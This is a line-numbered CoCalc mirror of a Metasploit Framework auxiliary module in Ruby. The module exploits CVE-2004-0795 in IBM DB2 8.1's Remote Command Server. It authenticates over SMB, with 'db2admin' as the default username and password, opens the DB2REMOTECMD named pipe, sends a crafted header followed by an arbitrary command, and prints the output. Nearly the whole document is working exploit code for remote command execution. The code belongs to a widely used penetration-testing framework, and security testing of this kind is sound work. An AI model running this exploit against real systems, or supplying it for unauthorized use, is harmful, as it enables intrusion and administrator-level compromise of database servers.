Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/admin/db2/db2rcmd.rb
19758 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Auxiliary

7
  include Msf::Exploit::Remote::SMB::Client

8


9
  def initialize(info = {})

10
    super(

11
      update_info(

12
        info,

13
        'Name' => 'IBM DB2 db2rcmd.exe Command Execution Vulnerability',

14
        'Description' => %q{

15
          This module exploits a vulnerability in the Remote Command Server

16
          component in IBM's DB2 Universal Database 8.1. An authenticated

17
          attacker can send arbitrary commands to the DB2REMOTECMD named pipe

18
          which could lead to administrator privileges.

19
        },

20
        'Author' => [ 'MC' ],

21
        'License' => MSF_LICENSE,

22
        'References' => [

23
          [ 'CVE', '2004-0795' ],

24
          [ 'OSVDB', '4180' ],

25
          [ 'BID', '9821' ],

26
        ],

27
        'DisclosureDate' => '2004-03-04',

28
        'Notes' => {

29
          'Stability' => [CRASH_SAFE],

30
          'SideEffects' => [IOC_IN_LOGS],

31
          'Reliability' => []

32
        }

33
      )

34
    )

35


36
    register_options(

37
      [

38
        OptString.new('CMD', [ true, 'The command to execute', 'ver']),

39
        OptString.new('SMBUser', [ true, 'The username to authenticate as', 'db2admin'], fallbacks: ['USERNAME']),

40
        OptString.new('SMBPass', [ true, 'The password for the specified username', 'db2admin'], fallbacks: ['PASSWORD']),

41
      ]

42
    )

43


44
    deregister_options('SMB::ProtocolVersion')

45
  end

46


47
  def run

48
    print_status('Connecting to the server...')

49
    connect(versions: [1])

50


51
    print_status("Authenticating as user '#{datastore['SMBUser']}' with pass '#{datastore['SMBPass']}'...")

52


53
    # Connect with a valid user/pass. if not, then bail.

54
    begin

55
      smb_login

56
    rescue StandardError => e

57
      print_error("Error: #{e}")

58
      disconnect

59
      return

60
    end

61


62
    # Have it so our command arg is convenient to call.

63
    rcmd = datastore['CMD']

64


65
    print_status('Connecting to named pipe \\DB2REMOTECMD...')

66


67
    # If the pipe doesn't exist, bail.

68
    begin

69
      pipe = simple.create_pipe('\\DB2REMOTECMD')

70
    rescue StandardError => e

71
      print_error("Error: #{e}")

72
      disconnect

73
      return

74
    end

75


76
    # If we get this far, do the dance.

77


78
    fid = pipe.file_id

79


80
    # Need to make a Trans2 request with the param of 'QUERY_FILE_INFO' keeping our file_id

81
    simple.client.trans2(0x0007, [fid, 1005].pack('vv'), '')

82


83
    # Write to the pipe, our command length comes into play.

84
    pipe.write([0x00000001].pack('V') + 'DB2' + "\x00" * 525 + [rcmd.length].pack('V'))

85
    # Send off our command

86
    pipe.write(rcmd)

87


88
    # Read from the pipe and give us the data.

89
    res = pipe.read

90
    print_line(res)

91


92
    # Close the named pipe and disconnect from the socket.

93
    pipe.close

94
    disconnect

95
  end

96
end

97


98